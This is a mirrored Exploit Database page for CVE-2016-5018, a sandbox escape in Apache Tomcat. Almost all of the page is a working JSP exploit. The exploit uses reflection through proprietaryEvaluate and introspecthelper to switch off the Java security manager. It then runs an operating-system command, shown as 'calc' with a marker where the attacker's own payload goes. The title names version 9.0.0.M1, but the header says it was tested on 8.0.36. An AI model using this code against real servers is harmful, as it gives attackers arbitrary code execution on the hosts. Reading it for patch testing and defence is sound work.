Tomcat proprietaryEvaluate 9.0.0.M1 – Sandbox Escape

• Exploit Database
• 16 阅读

• 作者： hantwister
  日期： 2020-01-08
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/47892/

• # Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
  # Date: 2020-01-07
  # Exploit Author: Harrison Neal, PatchAdvisor
  # Vendor Homepage: https://tomcat.apache.org/
  # Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
  # Version: 8.0.36
  # Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
  # Tested on: Windows 
  # CVE: CVE-2016-5018
   /* 
  # See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox. 
  # When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
  # In the Java tab, add the following options:
  # -Djava.security.manager
  # -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
   */
   
   <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
  <% 
  SecurityManager sm = System.getSecurityManager();
  
  if (sm != null) {
  try {
  ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();
  
  { // Tomcat 7+
  // Get the desired method
  Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
  "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
  Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7
  
  Method theMethod = null;
  
  for (Method m : methods) {
  if ("executeMethod".equals(m.getName())) {
  theMethod = m;
  break;
  }
  }
  
  // Set it to accessible
  JspRuntimeLibrary.introspecthelper(
  theMethod,
  "accessible",
  "true",
  request,
  null,
  false);
  
  // Run it
  theMethod.invoke(pageContext.getServletContext(),
  System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
  null,
  new Object[]{null}
  );
  }
  
  /*{ // Tomcat 5.5 and 6
  pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
  PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
  }*/
  
  } catch (Throwable ex) {
  PrintWriter pw = new PrintWriter(out);
  ex.printStackTrace(pw);
  pw.flush();
  }
  }
  
  // Your payload goes here
  try {
  Runtime.getRuntime().exec("calc");
  } catch (Throwable ex) {
  PrintWriter pw = new PrintWriter(out);
  ex.printStackTrace(pw);
  pw.flush();
  }
  
  // Optional put the security manager back
  if (sm != null) {
  System.setSecurityManager(sm);
  }
  %>